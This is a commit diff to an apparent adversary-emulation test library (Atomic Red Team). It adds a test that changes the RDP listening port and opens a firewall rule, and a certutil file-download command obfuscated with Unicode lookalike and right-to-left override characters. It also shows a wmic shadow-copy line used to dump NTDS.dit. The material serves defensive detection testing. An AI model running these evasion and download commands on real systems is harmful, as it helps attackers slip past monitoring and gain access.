rebuilt T1027.yml (#1649)

* just added dasta * adding yaml * fixing yaml * maintain desc spacing * keep original spacing * spacing * spacing Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2021-10-15 19:14:30 -04:00
parent cc313367cd
commit 5ca0cd8717
9 changed files with 2106 additions and 1969 deletions
@@ -465,6 +465,7 @@ defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compresse
 defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
 defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
 defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
+defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,command_prompt
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -917,7 +918,8 @@ lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf
 lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
 lateral-movement,T1021.001,Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
 lateral-movement,T1021.001,Remote Desktop Protocol,2,RDP to Server,7382a43e-f19c-46be-8f09-5c63af7d3e2b,powershell
-lateral-movement,T1021.001,Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
+lateral-movement,T1021.001,Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
+lateral-movement,T1021.001,Remote Desktop Protocol,4,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
@@ -308,6 +308,7 @@ defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compresse
 defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
 defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
 defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
+defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,command_prompt
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -663,7 +664,8 @@ lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf
 lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
 lateral-movement,T1021.001,Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
 lateral-movement,T1021.001,Remote Desktop Protocol,2,RDP to Server,7382a43e-f19c-46be-8f09-5c63af7d3e2b,powershell
-lateral-movement,T1021.001,Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
+lateral-movement,T1021.001,Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
+lateral-movement,T1021.001,Remote Desktop Protocol,4,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
@@ -749,6 +749,7 @@
  - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
  - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
  - Atomic Test #7: Obfuscated Command in PowerShell [windows]
+  - Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -1582,7 +1583,8 @@
 - [T1021.001 Remote Desktop Protocol](../../T1021.001/T1021.001.md)
  - Atomic Test #1: RDP to DomainController [windows]
  - Atomic Test #2: RDP to Server [windows]
-  - Atomic Test #3: Changing RDP Port to Non Standard Port [windows]
+  - Atomic Test #3: Changing RDP Port to Non Standard Port via Powershell [windows]
+  - Atomic Test #4: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
 - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -525,6 +525,7 @@
  - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
  - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
  - Atomic Test #7: Obfuscated Command in PowerShell [windows]
+  - Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -1171,7 +1172,8 @@
 - [T1021.001 Remote Desktop Protocol](../../T1021.001/T1021.001.md)
  - Atomic Test #1: RDP to DomainController [windows]
  - Atomic Test #2: RDP to Server [windows]
-  - Atomic Test #3: Changing RDP Port to Non Standard Port [windows]
+  - Atomic Test #3: Changing RDP Port to Non Standard Port via Powershell [windows]
+  - Atomic Test #4: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
 - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -283,7 +283,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume


 ```cmd
-wmic /node:#{target_host} shadowcopy call create Volume=#{drive_letter}
+wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
 ```


@@ -12,7 +12,9 @@ Adversaries may connect to a remote system over RDP/RDS to expand access if the

 - [Atomic Test #2 - RDP to Server](#atomic-test-2---rdp-to-server)

- [Atomic Test #3 - Changing RDP Port to Non Standard Port](#atomic-test-3---changing-rdp-port-to-non-standard-port)
+- [Atomic Test #3 - Changing RDP Port to Non Standard Port via Powershell](#atomic-test-3---changing-rdp-port-to-non-standard-port-via-powershell)
+
+- [Atomic Test #4 - Changing RDP Port to Non Standard Port via Command_Prompt](#atomic-test-4---changing-rdp-port-to-non-standard-port-via-command_prompt)


 <br/>
@@ -120,7 +122,7 @@ if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
 <br/>
 <br/>

-## Atomic Test #3 - Changing RDP Port to Non Standard Port
+## Atomic Test #3 - Changing RDP Port to Non Standard Port via Powershell
 Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell

 **Supported Platforms:** Windows
@@ -150,7 +152,47 @@ New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direc
 #### Cleanup Commands:
 ```powershell
 Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port}
-Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In"
+Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Changing RDP Port to Non Standard Port via Command_Prompt
+Changing RDP Port to Non Standard Port via Command_Prompt
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 74ace21e-a31c-4f7d-b540-53e4eb6d1f73
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| OLD_Remote_Port | Default RDP Listening Port | String | 3389|
+| NEW_Remote_Port | New RDP Listening Port | String | 4489|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f
+netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1
+netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
 ```


@@ -24,12 +24,13 @@ Adversaries may also obfuscate commands executed from payloads or directly via a

 - [Atomic Test #7 - Obfuscated Command in PowerShell](#atomic-test-7---obfuscated-command-in-powershell)

+- [Atomic Test #8 - Obfuscated Command Line using special Unicode characters](#atomic-test-8---obfuscated-command-line-using-special-unicode-characters)
+

 <br/>

 ## Atomic Test #1 - Decode base64 Data into Script
 Creates a base64-encoded data file and decodes it into an executable shell script
-
 Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`.

 **Supported Platforms:** macOS, Linux
@@ -62,7 +63,6 @@ chmod +x /tmp/art.sh

 ## Atomic Test #2 - Execute base64-encoded PowerShell
 Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
-
 Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"

 **Supported Platforms:** Windows
@@ -101,7 +101,6 @@ powershell.exe -EncodedCommand $EncodedCommand

 ## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry
 Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.
-
 Upon successful execution, powershell will execute encoded command and read/write from the registry.

 **Supported Platforms:** Windows
@@ -296,4 +295,44 @@ $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv'



+<br/>
+<br/>
+
+## Atomic Test #8 - Obfuscated Command Line using special Unicode characters
+This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters).
+Reference:
+https://wietze.github.io/blog/windows-command-line-obfuscation
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e68b945c-52d0-4dd9-a5e8-d173d70c448f
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
+| local_path | Local path to place file | Path | Atomic-license.txt|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+cmd /c certutil —ૹu૰rlࢰca࣢c෯he  –‮spli؅t‮‭ −"൏ᶠ൸" #{remote_file} #{local_path}
+```
+
+#### Cleanup Commands:
+```cmd
+del #{local_path} >nul 2>&1
+```
+
+
+
+
+
 <br/>
@@ -1,4 +1,4 @@
-attack_technique: T1027
+attack_technique: T1027
 display_name: Obfuscated Files or Information
 atomic_tests:
 - name: Decode base64 Data into Script